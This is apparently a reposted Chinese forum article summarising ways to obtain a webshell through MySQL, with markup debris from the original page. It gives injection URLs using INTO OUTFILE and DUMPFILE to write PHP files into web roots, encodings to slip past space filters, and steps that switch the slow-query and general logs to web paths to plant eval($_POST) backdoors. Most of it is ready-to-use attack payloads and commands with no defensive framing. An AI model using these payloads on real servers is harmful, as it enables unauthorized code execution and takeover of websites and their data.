mysql数据库中getshell的方式总结

康凡薇

outfile和dumpfile写shell


利用条件

1. <ul><li>数据库当前用户为root权限；</li><li>知道当前网站的绝对路径；</li><li>[code]PHP

复制代码

的

1. GPC

复制代码

为 off状态；(魔术引号，GET，POST，Cookie)

写入的那个路径存在写入权限。
[/code]
基于union联合查询：

1. ?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23
   
2. ?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23

复制代码

非联合查询

当我们无法使用联合查询时，我们可以使用

1. fields terminated by

复制代码

与

1. lines terminated by

复制代码

来写shell

1. ?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

复制代码

代替空格的方法
+号，

1. %0a

复制代码

、

1. %0b

复制代码

、

1. %a0

复制代码

、 /**/ 注释符等

outfile和dumpfile的区别

1. outfile

复制代码

:

1. 1、 支持多行数据同时导出
   
2. 2、 使用union联合查询时，要保证两侧查询的列数相同
   
3. 3、 会在换行符制表符后面追加反斜杠
   
4. 4、会在末尾追加换行

复制代码

1. dumpfile

复制代码

:

1. 1、 每次只能导出一行数据
   
2. 2、 不会在换行符制表符后面追加反斜杠
   
3. 3、 不会在末尾追加换行

复制代码

因此，我们可以使用

1. into dumpfile

复制代码

这个函数来顺利写入二进制文件;
当然

1. into outfile

复制代码

函数也可以写入二进制文件，但是无法生效（追加的反斜杠会使二进制文件无法生效）
当我们使用

1. dumpfile

复制代码

，应该手动添加 limit 限制，来获取不同的行数

secure_file_prive

MySQL的secure-file-prive参数是用来限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()传到哪个指定目录的。

1. secure_file_prive= ，结果为空的话，表示允许任何文件读写
   
2. secure_file_prive=NULL，表示不允许任何文件读写
   
3. secure_file_prive=‘某个路径’，表示这个路径作为文件读写的路径
   
4. 在mysql5.5版本前，都是默认为空，允许读取
   
5. 在mysql5.6版本后 ,默认为NULL，并且无法用[code]SQL

复制代码

语句对其进行修改。所以这种只能在配置进行修改。[/code]查询

1. secure_file_prive

复制代码

的参数

1. show global variables like "%secure%"

复制代码

利用sql语句修改参数

1. set global secure_file_prive=

复制代码

但是5.6后不能利用sql修改了，所以只能利用配置修改

1. 修改value的值：windows下修改配置文件：mysql.inilinux修改配置文件：my.cnf

复制代码

日志getshell


慢日志getshell

慢日志：
一般都是通过long_query_time选项来设置这个时间值，时间以秒为单位，可以精确到微秒。如果查询时间超过了这个时间值（默认为10秒），这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下：

1. show global variables like '%long_query_time%'
   
2. show global variables like '%long%'

复制代码

查看慢日志参数

1. show global variables like '%slow%'

复制代码

对慢日志参数进行修改

1. set global slow_query_log=1 #打开慢日志
   
2. set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路径
   
3. 注意：一定要用双反斜杠
   
4. SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
   
5. 这儿11是超过慢日志的10秒时间

复制代码

利用general_log

利用

1. general_log

复制代码

，可以将所有到达mysql服务器的sql语句，都记录下来。
相关参数一共有3个：general_log、log_output、general_log_file

1. show variables like 'general_log';  -- 查看日志是否开启
   
2. set global general_log=on; -- 开启日志功能
   
3. 
   
4. 
   
5. show variables like 'general_log_file';  -- 看看日志文件保存位置
   
6. set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置
   
7. 
   
8. 
   
9. show variables like 'log_output';  -- 看看日志输出类型  table或file
   
10. set global log_output='table'; -- 设置输出类型为 table
    
11. set global log_output='file';   -- 设置输出类型为file

复制代码

一般log_output都是

1. file

复制代码

,就是将日志存入文件中。

1. table

复制代码

的话就是将日志存入数据库的日志表中。
getshell

1. set global general_log=on
   
2. set global general_log_file='需要攻击的路径'
   
3. select '<?php eval($_POST[cmd]);?>'

复制代码

这样就将一句话木马记录到

1. general_log

复制代码

中，从而getshell

binlog的介绍

可以看看这个

总结

到此这篇关于mysql数据库中getshell方式的文章就介绍到这了,更多相关mysql getshell的方式内容请搜索晓枫资讯以前的文章或继续浏览下面的相关文章希望大家以后多多支持晓枫资讯！

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

两只小红猪柏

顶顶更健康！！！